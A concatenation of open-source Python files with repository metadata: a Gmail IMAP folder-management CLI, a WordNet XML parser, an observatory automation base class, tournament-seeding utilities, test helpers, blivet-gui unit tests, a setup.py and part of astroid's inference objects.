print "Folder %s deleted" % folder
except IMAPClient.Error as err:
print "Folder deletion failed"
print err
# Creates a new folder and copies the content from the two folders that need to be merged
# Then deletes the old folders
def merge_folders(self, merged_folder, folder_1, folder_2):
try:
self.create_folder(merged_folder)
# Selects the folder with read/write permission
self.myIMAPc.select_folder(folder_1, True)
messages = self.myIMAPc.search(['NOT DELETED'])
print "Moving %d messages from %s to %s" % (len(messages), folder_1, merged_folder)
self.myIMAPc.copy(messages, merged_folder)
self.myIMAPc.select_folder(folder_2, True)
messages = self.myIMAPc.search(['NOT DELETED'])
print "Moving %d messages from %s to %s" % (len(messages), folder_2, merged_folder)
self.myIMAPc.copy(messages, merged_folder)
print "Deleting %s and %s..." % (folder_1, folder_2)
self.delete_folder(folder_1)
self.delete_folder(folder_2)
print "Merge folder operation succeeded"
except IMAPClient.Error as err:
print "Merge operation failed"
print err
def logout(self):
self.myIMAPc.logout()
def main():
# Using parser library for handling command line arguments
usage = "usage: python gmailPy.py [options]"
prog_desc = """gmailPy is a scalable command line gmail client capable of adding, deleting, renaming and merging folders. It also provides interface for the user to delete big messages based on size and search criteria."""
parser = optparse.OptionParser(usage=usage, description=prog_desc)
parser.add_option(
'-l', '--list', help="List folder statistics. This doesn't need any arguments. Usage: python gmailPy.py -l", dest='lf',
default=False, action='store_true')
parser.add_option(
'-b', '--big', help='Delete big messages. Please enter folder name as an argument. For example: python gmailPy.py -b INBOX',
dest='big_folder_name', action='store')
parser.add_option(
'-s', '--bigsearch', help='Delete big messages based on search criteria. This takes 3 arguments folder_name, command and criteria. For example: python gmailPy.py -s INBOX FROM xyz@gmail.com',
dest='bigsearch_folder_name', action='store', nargs=3)
parser.add_option(
'-n', '--new', help='Create new folder. Please enter folder name as an argument. For example: python gmailPy.py -n Test_folder',
dest='new_folder_name', action='store')
parser.add_option(
'-d', '--del', help='Delete a folder. Please enter folder name as an argument. For example: python gmailPy.py -d Test_folder',
dest='del_folder_name', action='store')
parser.add_option(
'-r', '--rename', help='Rename a folder. Please enter old_folder_name and new_folder_name as two arguments. For example: python gmailPy.py -r OLDFOLDERNAME NEWFOLDERNAME',
dest='rename_folder_name', action='store', nargs=2)
parser.add_option(
'-m', '--merge', help='Merge two folders. This takes 3 arguments merged_folder_name , folder_1_name , folder_2_name. For example: python gmailPy.py -m Test_folder_2 Test_folder_0 Test_folder_1',
dest='merge_folder_name', action='store', nargs=3)
(opts, args) = parser.parse_args()
try:
print "***** Welcome to gmailPy!!! A command line GMAIL Client *****"
print "Please enter your username and password >>>>>>"
username = raw_input("Username: ")
password = getpass.getpass()
## Can be set for testing and debugging
# username = 'username'
# password = 'password'
client_session = gmailPy()
client_session.login(username, password)
if opts.lf:
client_folders = client_session.get_folders()
print "########## Your folder Statistics ##########"
for item in client_folders:
try:
print item, ':', client_session.get_mail_count(item), 'messages'
except:
pass
print "############################################"
if opts.big_folder_name != None:
print "Let's enter your %s folder and delete big mail" % opts.big_folder_name
client_session.delete_bigmail(opts.big_folder_name)
available_commands = ['TO', 'FROM', 'SUBJECT']
if opts.bigsearch_folder_name != None:
if opts.bigsearch_folder_name[1] in available_commands:
print "Let's enter your %s folder and delete big mail with %s: %s" % (opts.bigsearch_folder_name[0], opts.bigsearch_folder_name[1], opts.bigsearch_folder_name[2])
client_session.delete_bigmail_search(
opts.bigsearch_folder_name[0], opts.bigsearch_folder_name[1], opts.bigsearch_folder_name[2])
else:
print "Invalid Command Entry. Please enter one of the follwing commands: ", available_commands
if opts.new_folder_name != None:
print "Creating a new folder with name %s ..." % opts.new_folder_name
client_session.create_folder(opts.new_folder_name)
if opts.del_folder_name != None:
print "Deleting %s folder..." % opts.del_folder_name
client_session.delete_folder(opts.del_folder_name)
if opts.rename_folder_name != None:
print "Renaming folder %s to %s..." % (opts.rename_folder_name[0], opts.rename_folder_name[1])
client_session.rename_folder(opts.rename_folder_name[0], opts.rename_folder_name[1])
if opts.merge_folder_name != None:
print "Merging folders %s and %s to %s..." % (opts.merge_folder_name[1], opts.merge_folder_name[2], opts.merge_folder_name[0])
client_session.merge_folders(opts.merge_folder_name[0], opts.merge_folder_name[1], opts.merge_folder_name[2])
client_session.logout()
except IMAPClient.Error as err:
print "Something awful happened"
print err
except KeyboardInterrupt:
print "gmailPy force shutdown"
client_session.logout()
if __name__ == '__main__':
main()
|
hornedbull/gmailPy
|
gmailPy.py
|
Python
|
gpl-2.0
| 13,792
|
#!/usr/bin/env python3
# -*- coding: utf-8, vim: expandtab:ts=4 -*-
import sys
import xml.sax
import synset
DEBUG = False
class WNXMLParserException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class WNXMLParserErrorHandler(xml.sax.ErrorHandler):
def warning(self, msg):
print("SAX parser warning: {0}".format(msg), file=sys.stderr)
def error(self, msg):
raise WNXMLParserException("SAX parser error: {0}".format(msg))
def fatal(self, msg):
raise WNXMLParserException("SAX parser fatal error: {0}".format(msg))
class WNXMLParserContentHandler(xml.sax.ContentHandler):
def __init__(self):
xml.sax.ContentHandler.__init__(self)
self.m_lcnt = 0 # input line number
self.m_ppath = [] # contains the XML path to the current node (names of the ancestors)
self.m_done = -1 # -1: not started synset yet, 0: inside synset, 1: done with synset
self.m_syns = synset.Synset() # points to the output struct
self.m_syns_list = [] # points to the output struct
self.m_ilrs0_temp = "" # Temp vars for Tuples (std::pair in C++)
self.m_ilrs1_temp = ""
self.m_sumolinks0_temp = ""
self.m_sumolinks1_temp = ""
self.m_elrs0_temp = ""
self.m_elrs1_temp = ""
self.m_elrs30_temp = ""
self.m_elrs31_temp = ""
self.m_ekszlinks0_temp = ""
self.m_ekszlinks1_temp = ""
self.m_vframelinks0_temp = ""
self.m_vframelinks1_temp = ""
self.m_startroot = False # was there a starting root tag?
self.m_endroot = False # was there an end root tag?
def endDocument(self):
if self.m_done != 1: # reached eof before end of segment
raise WNXMLParserException("Warning: end of file reached before </SYNSET>, possibly corrupt input")
def startElement(self, name, attrs):
if DEBUG:
print("({0}, {1}): /{2}/START: {3}".format(self._locator.getLineNumber(),
self._locator.getColumnNumber(),
"/".join(self.m_ppath),
name))
self.m_ppath.append(name)
if len(self.m_ppath) >= 2:
parent = self.m_ppath[-2]
else:
parent = ""
if len(self.m_ppath) >= 3:
gparent = self.m_ppath[-3]
else:
gparent = ""
# VisDic XML format fault tolerance (no root tag)
if name == "WNXML":
self.m_startroot = True
elif name == "SYNSET":
if self.m_done == 0:
raise WNXMLParserException("WNXMLParser internal error: SYNSET should start now, but m_done is not 0 ({0})!".format(self.m_done))
self.m_done = 0
self.m_lcnt = self._locator.getLineNumber()
elif name == "LITERAL" and parent == "SYNONYM" and gparent == "SYNSET":
self.m_syns.synonyms.append(synset.Synonym("", ""))
elif name == "ILR" and parent == "SYNSET":
self.m_ilrs0_temp = ""
self.m_ilrs1_temp = ""
elif name == "SUMO" and parent == "SYNSET":
self.m_sumolinks0_temp = ""
self.m_sumolinks1_temp = ""
elif name == "ELR" and parent == "SYNSET":
self.m_elrs0_temp = ""
self.m_elrs1_temp = ""
elif name == "ELR3" and parent == "SYNSET":
self.m_elrs30_temp = ""
self.m_elrs31_temp = ""
elif name == "EKSZ" and parent == "SYNSET":
self.m_ekszlinks0_temp = ""
self.m_ekszlinks1_temp = ""
elif name == "VFRAME" and parent == "SYNSET":
self.m_vframelinks0_temp = ""
self.m_vframelinks1_temp = ""
elif name == "USAGE" and parent == "SYNSET":
self.m_syns.usages.append("")
elif name == "SNOTE" and parent == "SYNSET":
self.m_syns.snotes.append("")
elif name == "EQ_NEAR_SYNONYM" and parent == "SYNSET":
self.m_syns.elrs.append(["", "eq_near_synonym"])
elif name == "EQ_HYPERNYM" and parent == "SYNSET":
self.m_syns.elrs.append(["", "eq_has_hypernym"])
elif name == "EQ_HYPONYM" and parent == "SYNSET":
self.m_syns.elrs.append(["", "eq_has_hyponym"])
#elif name == "ELR" and parent == "SYNSET":
# self.m_syns.elrs.append(["", ""])
elif name == "EKSZ" and parent == "SYNSET":
self.m_syns.ekszlinks.append(["", ""])
elif name == "VFRAME" and parent == "SYNSET":
self.m_syns.vframelinks.append(["", ""])
def characters(self, chrs):
if DEBUG:
print("({0}, {1}): /{2}/#PCDATA: {3}".format(self._locator.getLineNumber(),
self._locator.getColumnNumber(),
"/".join(self.m_ppath),
chrs))
if self.m_done == 1 or self.m_done == -1:
return
self.m_ppath.append("#PCDATA")
if 2 <= len(self.m_ppath):
parent = self.m_ppath[-2]
else:
parent = ""
if 3 <= len(self.m_ppath):
gparent = self.m_ppath[-3]
else:
gparent = ""
if 4 <= len(self.m_ppath):
ggparent = self.m_ppath[-4]
else:
ggparent = ""
if parent == "ID" and gparent == "SYNSET": # SYNSET/ID
self.m_syns.wnid += chrs
elif parent == "ID3" and gparent == "SYNSET": # SYNSET/ID3
self.m_syns.wnid3 += chrs
elif parent == "POS" and gparent == "SYNSET": # SYNSET/POS
self.m_syns.pos += chrs
elif parent == "LITERAL" and gparent == "SYNONYM": # SYNSET/SYNONYM/LITERAL
if len(self.m_syns.synonyms) == 0:
raise WNXMLParserException("WNXMLParser internal error: synonyms empty at LITERAL tag")
self.m_syns.synonyms[-1].literal += chrs
elif parent == "SENSE" and gparent == "LITERAL" and ggparent == "SYNONYM": # SYNSET/SYNONYM/LITERAL/SENSE
if len(self.m_syns.synonyms) == 0:
raise WNXMLParserException("WNXMLParser internal error: synonyms empty at SENSE tag")
self.m_syns.synonyms[-1].sense += chrs
elif parent == "LNOTE" and gparent == "LITERAL" and ggparent == "SYNONYM": # SYNSET/SYNONYM/LITERAL/LNOTE
if len(self.m_syns.synonyms) == 0:
raise WNXMLParserException("WNXMLParser internal error: synonyms empty({0}) at LNOTE tag".format(len(self.m_syns.synonyms)))
self.m_syns.synonyms[-1].lnote += chrs
elif parent == "NUCLEUS" and gparent == "LITERAL" and ggparent == "SYNONYM": # SYNSET/SYNONYM/LITERAL/NUCLEUS
if len(self.m_syns.synonyms) == 0:
raise WNXMLParserException("WNXMLParser internal error: synonyms empty at NUCLEUS tag")
self.m_syns.synonyms[-1].nucleus += chrs
elif parent == "DEF" and gparent == "SYNSET": # SYNSET/DEF
self.m_syns.definition += chrs
elif parent == "BCS" and gparent == "SYNSET": # SYNSET/BCS
self.m_syns.bcs += chrs
elif parent == "USAGE" and gparent == "SYNSET": # SYNSET/USAGE
if len(self.m_syns.usages) == 0:
raise WNXMLParserException("WNXMLParser internal error: usages empty at USAGE tag")
self.m_syns.usages[-1] += chrs
elif parent == "SNOTE" and gparent == "SYNSET": # SYNSET/SNOTE
if len(self.m_syns.snotes) == 0:
raise WNXMLParserException("WNXMLParser internal error: snotes empty at SNOTE tag")
self.m_syns.snotes[-1] += chrs
elif parent == "STAMP" and gparent == "SYNSET": # SYNSET/STAMP
self.m_syns.stamp += chrs
elif parent == "DOMAIN" and gparent == "SYNSET": # SYNSET/STAMP
self.m_syns.domain += chrs
elif parent == "NL" and gparent == "SYNSET": # SYNSET/NL
self.m_syns.nl += chrs
elif parent == "TNL" and gparent == "SYNSET": # SYNSET/TNL
self.m_syns.tnl += chrs
elif parent == "ILR" and gparent == "SYNSET": # SYNSET/ILR
self.m_ilrs0_temp += chrs
elif parent == "TYPE" and gparent == "ILR": # SYNSET/ILR/TYPE
self.m_ilrs1_temp += chrs
elif parent == "SUMO" and gparent == "SYNSET": # SYNSET/SUMO
self.m_sumolinks0_temp += chrs
elif parent == "TYPE" and gparent == "SUMO": # SYNSET/SUMO/TYPE
self.m_sumolinks1_temp += chrs
elif parent == "EQ_NEAR_SYNONYM" and gparent == "SYNSET": # SYNSET/EQ_NEAR_SYNONYM
self.m_elrs0_temp += chrs
elif parent == "EQ_HYPERNYM" and gparent == "SYNSET": # SYNSET/EQ_HYPERNYM
self.m_elrs0_temp += chrs
elif parent == "EQ_HYPONYM" and gparent == "SYNSET": # SYNSET/EQ_HYPONYM
self.m_elrs0_temp += chrs
elif parent == "ELR" and gparent == "SYNSET": # SYNSET/ELR
self.m_elrs0_temp += chrs
elif parent == "TYPE" and gparent == "ELR": # SYNSET/ELR/TYPE
self.m_elrs1_temp += chrs
elif parent == "ELR3" and gparent == "SYNSET": # SYNSET/ELR3
self.m_elrs30_temp += chrs
elif parent == "TYPE" and gparent == "ELR3": # SYNSET/ELR3/TYPE
self.m_elrs31_temp += chrs
elif parent == "EKSZ" and gparent == "SYNSET": # SYNSET/EKSZ
self.m_ekszlinks0_temp += chrs
elif parent == "TYPE" and gparent == "EKSZ": # SYNSET/EKSZ/TYPE
self.m_ekszlinks1_temp += chrs
elif parent == "VFRAME" and gparent == "SYNSET": # SYNSET/VFRAME
self.m_vframelinks0_temp += chrs
elif parent == "TYPE" and gparent == "VFRAME": # SYNSET/VFRAME/TYPE
self.m_vframelinks1_temp += chrs
self.m_ppath.pop()
def endElement(self, name):
if DEBUG:
print("({0}, {1}): /{2}/END: {3}".format(self._locator.getLineNumber(),
self._locator.getColumnNumber(),
"/".join(self.m_ppath),
name))
if len(self.m_ppath) >= 2:
parent = self.m_ppath[-2]
else:
parent = ""
if name == "WNXML": # WNXML
self.m_endroot = True
elif name == "SYNSET": # SYNSET
if self.m_done != 0:
raise WNXMLParserException("This is impossible!\nThe parser should've caught this error: 'SYNSET' end tag without previous begin tag")
self.m_done = 1
self.m_syns_list.append((self.m_syns, self.m_lcnt))
self.m_syns = synset.Synset()
elif name == "ILR" and parent == "SYNSET":
self.m_syns.ilrs.append((self.m_ilrs0_temp, self.m_ilrs1_temp))
self.m_ilrs0_temp = ""
self.m_ilrs1_temp = ""
elif name == "SUMO" and parent == "SYNSET":
self.m_syns.sumolinks.append((self.m_sumolinks0_temp, self.m_sumolinks1_temp))
self.m_sumolinks0_temp = ""
self.m_sumolinks1_temp = ""
elif name == "ELR" and parent == "SYNSET":
self.m_syns.elrs.append((self.m_elrs0_temp, self.m_elrs1_temp))
self.m_elrs0_temp = ""
self.m_elrs0_temp = ""
elif name == "ELR3" and parent == "SYNSET":
self.m_syns.elrs3.append((self.m_elrs30_temp, self.m_elrs31_temp))
self.m_elrs30_temp = ""
self.m_elrs30_temp = ""
elif name == "EKSZ" and parent == "SYNSET":
self.m_syns.ekszlinks.append((self.m_ekszlinks0_temp, self.m_ekszlinks1_temp))
self.m_ekszlinks0_temp = ""
self.m_ekszlinks1_temp = ""
elif name == "VFRAME" and parent == "SYNSET":
self.m_syns.vframelinks.append((self.m_vframelinks0_temp, self.m_vframelinks1_temp))
self.m_vframelinks0_temp = ""
self.m_vframelinks1_temp = ""
self.m_ppath.pop()
# Magic lies here
# Source: http://stackoverflow.com/a/12263340
def parse(self, input_file):
# Make parser
xmlReader = xml.sax.make_parser()
# set self as ContentHandler
xmlReader.setContentHandler(self)
# Set ErrorHandler
xmlReader.setErrorHandler(WNXMLParserErrorHandler())
# Do the actual parsing
xmlReader.parse(input_file)
# Return the gathered result
return self.m_syns_list
|
ppke-nlpg/pywnxml
|
WNXMLParser.py
|
Python
|
gpl-2.0
| 12,898
|
#! /usr/bin/env python
# -*- coding: iso-8859-1 -*-
# chimera - observatory automation system
# Copyright (C) 2006-2007 P. Henrique Silva <henrique@astro.ufsc.br>
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from chimera.core.metaobject import MetaObject
from chimera.core.remoteobject import RemoteObject
from chimera.core.config import Config
from chimera.core.eventsproxy import EventsProxy
from chimera.core.state import State
from chimera.core.location import Location
from chimera.core.constants import EVENTS_ATTRIBUTE_NAME
from chimera.core.constants import METHODS_ATTRIBUTE_NAME
from chimera.core.constants import CONFIG_PROXY_NAME
from chimera.core.constants import INSTANCE_MONITOR_ATTRIBUTE_NAME
from chimera.core.constants import RWLOCK_ATTRIBUTE_NAME
from chimera.interfaces.lifecycle import ILifeCycle
import chimera.core.log
import logging
import time
import threading
__all__ = ['ChimeraObject']
class ChimeraObject (RemoteObject, ILifeCycle):
__metaclass__ = MetaObject
def __init__ (self):
RemoteObject.__init__(self)
# event handling
self.__events_proxy__ = EventsProxy ()
# configuration handling
self.__config_proxy__ = Config (self)
self.__state__ = State.STOPPED
self.__location__ = ""
# logging.
# put every logger on behalf of chimera's logger so
# we can easily setup levels on all our parts
logName = self.__module__
if not logName.startswith("chimera."):
logName = "chimera."+logName+" (%s)" % logName
self.log = logging.getLogger(logName)
# Hz
self._Hz = 2
self._loop_abort = threading.Event()
# config implementation
def __getitem__ (self, item):
# any thread can read if none writing at the time
lock = getattr(self, RWLOCK_ATTRIBUTE_NAME)
try:
lock.acquireRead()
return self.__config_proxy__.__getitem__ (item)
finally:
lock.release()
def __setitem__ (self, item, value):
# only one thread can write
lock = getattr(self, RWLOCK_ATTRIBUTE_NAME)
try:
lock.acquireWrite()
return self.__config_proxy__.__setitem__ (item, value)
finally:
lock.release()
# bulk configuration (pass a dict to config multiple values)
def __iadd__ (self, configDict):
# only one thread can write
lock = getattr(self, RWLOCK_ATTRIBUTE_NAME)
try:
lock.acquireWrite()
self.__config_proxy__.__iadd__ (configDict)
finally:
lock.release()
return self.getProxy()
# locking
def __enter__ (self):
return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).__enter__()
def __exit__ (self, *args):
return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).__exit__(*args)
def acquire(self, blocking=True):
return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).acquire(blocking)
def release(self):
return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).release()
def wait(self, timeout=None):
return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).wait(timeout)
def notify(self, n=1):
return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).notify(n)
def notifyAll(self):
return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).notifyAll()
# reflection
def __get_events__ (self):
return getattr(self, EVENTS_ATTRIBUTE_NAME)
def __get_methods__ (self):
return getattr(self, METHODS_ATTRIBUTE_NAME)
def __get_config__ (self):
return getattr(self, CONFIG_PROXY_NAME).items()
# ILifeCycle implementation
def __start__ (self):
return True
def __stop__ (self):
return True
def getHz (self):
return self._Hz
def setHz (self, freq):
tmpHz = self.getHz()
self._Hz = freq
return tmpHz
def __main__ (self):
self._loop_abort.clear()
timeslice = 0.5
runCondition = True
while runCondition:
runCondition = self.control()
if self._loop_abort.isSet():
return True
# FIXME: better idle loop
# we can't sleep for the whole time because
# if object set a long sleep time and Manager decides to
# shutdown, we must be alseep to receive his message and
# return.
timeToWakeUp = 1.0/self.getHz()
sleeped = 0
while sleeped < timeToWakeUp:
time.sleep(timeslice)
if self._loop_abort.isSet(): return True
sleeped += timeslice
return True
def __abort_loop__ (self):
self._loop_abort.set()
def control (self):
return False
def getState (self):
return self.__state__
def __setstate__ (self, state):
oldstate = self.__state__
self.__state__ = state
return oldstate
def getLocation (self):
return self.__location__
def __setlocation__ (self, location):
location = Location(location)
self.__location__ = location
self.setGUID("/%s/%s" % (location.cls, location.name))
return True
def getManager (self):
if self.getDaemon():
return self.getDaemon().getProxyForObj(self.getDaemon().getManager())
def getProxy (self):
# just to put everthing together (no need to change the base implementation)
return super(ChimeraObject, self).getProxy()
def getGUID(self):
return self.objectGUID
def getMetadata(self, request):
return []
|
wschoenell/chimera_imported_googlecode
|
src/chimera/core/chimeraobject.py
|
Python
|
gpl-2.0
| 6,427
|
import os
import sys
# Pool type enum
class PoolType:
BRACKET = 1
ROUND_ROBIN = 2
# Load functions.
def ParseConfigLine(line, config_types):
split_line = line.split()
for i in xrange(len(split_line)):
split_line[i] = split_line[i].strip()
split_line = filter(None, split_line)
if not len(split_line) == 2:
return (None, None)
field = split_line[0].strip()
value = split_line[1].strip()
if field not in config_types or config_types[field] == 'string':
return (field, value)
elif config_types[field] == 'int':
return (field, int(value))
elif config_types[field] == 'float':
return (field, float(value))
elif config_types[field] == 'bool':
return (field, bool(value))
else:
return (None, None)
def LoadConfig(config, config_types):
try:
with open(config["config_file"]) as f:
VerifyEncoding(f, "Config")
line_num = 1
for line in f:
if not IsCommentLine(line):
try:
field, value = ParseConfigLine(line, config_types)
if not field == None and not value == None:
print "Found config setting: " + field + ": \"" + str(value) + "\" " + str(type(value))
config[field] = value
else:
print "Skipping config line:", line_num
except ValueError:
print "Could not parse config line:", line_num
line_num += 1
print "Loaded config settings"
print "-"*60
except IOError:
print "No config file found. Using default configuration."
def LoadPlayers(config, player_map):
try:
with open(config["player_in_file"]) as f:
VerifyEncoding(f, "Players")
line_num = 1
for line in f:
if not IsCommentLine(line):
split_line = line.split(",")
for i in xrange(len(split_line)):
split_line[i] = split_line[i].strip()
split_line = filter(None, split_line)
if len(split_line) == 3:
try:
player_map.AddPlayerRaw(split_line[0], split_line[1], split_line[2])
except ValueError:
print "Count not parse player line:", line_num
else:
print "Skipping player line:", line_num
print split_line
line_num += 1
print "Loaded player data. Players found:", player_map.num_players
except IOError:
print "No player data file found. Exiting."
sys.exit(0)
if len(player_map.player_list) < 2:
print "Not enough players found. Exiting."
sys.exit(0)
def IsCommentLine(line):
return len(line.lstrip()) > 0 and line.lstrip()[0] == '#'
def VerifyEncoding(file, type):
line = file.readline()
try:
line.decode('utf8')
except UnicodeDecodeError:
print type, "file is not UTF-8. Please save players file as UTF-8."
sys.exit(0)
file.seek(0)
# Output functions.
def PrintStr(param):
print param[0]
def WriteStr(param):
if not len(param) == 2:
print "Write error: Incorrect number of params."
return
str_out, filepath = param[0], param[1]
if filepath == None:
print "Write error: No filepath."
return
try:
if not os.path.exists(os.path.dirname(filepath)):
os.makedirs(os.path.dirname(filepath))
with open(filepath, "w") as f:
f.write(str_out)
print "Wrote to: " + filepath
except IOError:
print "Write error: File not found: " + filepath + " Skipping."
if __name__ == "__main__":
print "Run seeding.py"
# Debug verification in case something is really messed up and there are duplicate players. (Cava is not The Brig no matter how much he wishes he was).
def VerifyPlayers(players):
error = False
for i in xrange(0, len(players)-1):
for j in xrange(i+1, len(players)):
if players[i] == players[j]:
print "ERROR", players[i], players[j]
print players
error = True
if error:
None.duplicate_player
|
aalberg/regional-seeding
|
src/util.py
|
Python
|
gpl-2.0
| 3,895
|
"""
Copyright (c) 2015 Tim Waugh <tim@cyberelk.net>
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
import functools
from inspect import getsourcefile
import os
import sys
def mock_systemd():
import tests.missing
mock_path = getsourcefile(tests.missing)
sys.path.append(os.path.dirname(mock_path))
def maybe_mock_systemd():
try:
from systemd import journal # noqa: F401
except ImportError:
mock_systemd()
class Watcher(object):
def __init__(self):
self.calls = []
def watch_call(self, func):
return functools.partial(self.called, func)
def called(self, func, *args, **kwargs):
self.calls.append((func, args, repr(kwargs)))
|
twaugh/journal-brief
|
tests/util.py
|
Python
|
gpl-2.0
| 1,376
|
# -*- coding: utf-8 -*-
import unittest
from unittest.mock import MagicMock
import os
from blivetgui.i18n import _, P_
from blivetgui.list_actions import ListActions
@unittest.skipUnless("DISPLAY" in os.environ.keys(), "requires X server")
class ListActionsTest(unittest.TestCase):
buttons_state = None
actions_label = None
def _set_buttons_state(self, state):
self.buttons_state = state
def _set_actions_label(self, label):
self.actions_label = label
def setUp(self):
self.blivet_gui = MagicMock()
self.blivet_gui.configure_mock(activate_action_buttons=self._set_buttons_state)
self.blivet_gui.configure_mock(label_actions=MagicMock(set_markup=self._set_actions_label))
self.actions_list = ListActions(self.blivet_gui)
self.actions_list.initialize()
def test_initial_state(self):
self.assertFalse(self.buttons_state)
self.assertIn(_("No pending actions"), self.actions_label)
self.assertEqual(self.actions_list.actions, 0)
self.assertEqual(len(self.actions_list.history), 0)
def test_append(self):
action1 = MagicMock()
action2 = MagicMock()
self.actions_list.append(action_type="add", action_desc="add", blivet_actions=[action1, action2])
self.assertEqual(self.actions_list.actions, 1)
self.assertEqual(len(self.actions_list.history), 1)
self.assertTrue([action1, action2] in self.actions_list.history)
self.assertTrue(self.buttons_state)
self.assertIn(P_("%s pending action", "%s pending actions", 1) % 1, self.actions_label)
def test_pop(self):
action1 = MagicMock()
self.actions_list.append(action_type="add", action_desc="add", blivet_actions=[action1])
action2 = MagicMock()
self.actions_list.append(action_type="add", action_desc="add", blivet_actions=[action2])
# pop action2 from the list
pop = self.actions_list.pop()
self.assertEqual(pop, [action2])
self.assertEqual(self.actions_list.actions, 1)
self.assertEqual(len(self.actions_list.history), 1)
self.assertTrue([action1] in self.actions_list.history) # action1 should stay there
self.assertFalse([action2] in self.actions_list.history) # action2 shouldn't
self.assertTrue(self.buttons_state)
self.assertIn(P_("%s pending action", "%s pending actions", 1) % 1, self.actions_label)
# pop action1 from the list
pop = self.actions_list.pop()
self.assertEqual(pop, [action1])
self.assertEqual(self.actions_list.actions, 0)
self.assertEqual(len(self.actions_list.history), 0)
self.assertFalse(self.buttons_state)
self.assertIn(_("No pending actions"), self.actions_label)
def test_clear(self):
action1 = MagicMock()
self.actions_list.append(action_type="add", action_desc="add", blivet_actions=[action1])
self.actions_list.clear()
self.assertEqual(self.actions_list.actions, 0)
self.assertEqual(len(self.actions_list.history), 0)
self.assertFalse(self.buttons_state)
self.assertIn(_("No pending actions"), self.actions_label)
if __name__ == "__main__":
unittest.main()
|
rhinstaller/blivet-gui
|
tests/blivetgui_tests/list_actions_test.py
|
Python
|
gpl-2.0
| 3,259
|
#!/usr/bin/env python
# MusicLibraryPy - Tools to analyse and repair/update music libraries
# Copyright © 2016 Rob Hardwick
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
from distutils.core import setup
setup(
name='MusicLibraryPy',
version='0.1',
description='Tools to analyse and repair/update music libraries',
author='Rob Hardwick',
author_email='robhardwick@gmail.com',
url='https://github.com/robhardwick/music-library-py',
scripts=[
'tools/music-library-report',
'tools/music-library-update',
],
install_requires=[
'mutagen>=1.31',
'python-magic>=0.4.11',
],
packages=['musiclibrary'])
|
robhardwick/music-library-py
|
setup.py
|
Python
|
gpl-2.0
| 1,122
|
# copyright 2003-2015 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This file is part of astroid.
#
# astroid is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# astroid is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with astroid. If not, see <http://www.gnu.org/licenses/>.
"""
Inference objects are a way to represent composite AST nodes,
which are used only as inference results, so they can't be found in the
original AST tree. For instance, inferring the following frozenset use,
leads to an inferred FrozenSet:
Call(func=Name('frozenset'), args=Tuple(...))
"""
import six
from astroid import bases
from astroid import decorators
from astroid import exceptions
from astroid import MANAGER
from astroid import node_classes
from astroid import scoped_nodes
from astroid import util
BUILTINS = six.moves.builtins.__name__
class FrozenSet(node_classes._BaseContainer):
"""class representing a FrozenSet composite node"""
def pytype(self):
return '%s.frozenset' % BUILTINS
def _infer(self, context=None):
yield self
@decorators.cachedproperty
def _proxied(self):
builtins = MANAGER.astroid_cache[BUILTINS]
return builtins.getattr('frozenset')[0]
class Super(node_classes.NodeNG):
"""Proxy class over a super call.
This class offers almost the same behaviour as Python's super,
which is MRO lookups for retrieving attributes from the parents.
The *mro_pointer* is the place in the MRO from where we should
start looking, not counting it. *mro_type* is the object which
provides the MRO, it can be both a type or an instance.
*self_class* is the class where the super call is, while
*scope* is the function where the super call is.
"""
def __init__(self, mro_pointer, mro_type, self_class, scope):
self.type = mro_type
self.mro_pointer = mro_pointer
self._class_based = False
self._self_class = self_class
self._scope = scope
self._model = {
'__thisclass__': self.mro_pointer,
'__self_class__': self._self_class,
'__self__': self.type,
'__class__': self._proxied,
}
def _infer(self, context=None):
yield self
def super_mro(self):
"""Get the MRO which will be used to lookup attributes in this super."""
if not isinstance(self.mro_pointer, scoped_nodes.ClassDef):
raise exceptions.SuperError(
"The first argument to super must be a subtype of "
"type, not {mro_pointer}.", super_=self)
if isinstance(self.type, scoped_nodes.ClassDef):
# `super(type, type)`, most likely in a class method.
self._class_based = True
mro_type = self.type
else:
mro_type = getattr(self.type, '_proxied', None)
if not isinstance(mro_type, (bases.Instance, scoped_nodes.ClassDef)):
raise exceptions.SuperError(
"The second argument to super must be an "
"instance or subtype of type, not {type}.",
super_=self)
if not mro_type.newstyle:
raise exceptions.SuperError("Unable to call super on old-style classes.", super_=self)
mro = mro_type.mro()
if self.mro_pointer not in mro:
raise exceptions.SuperError(
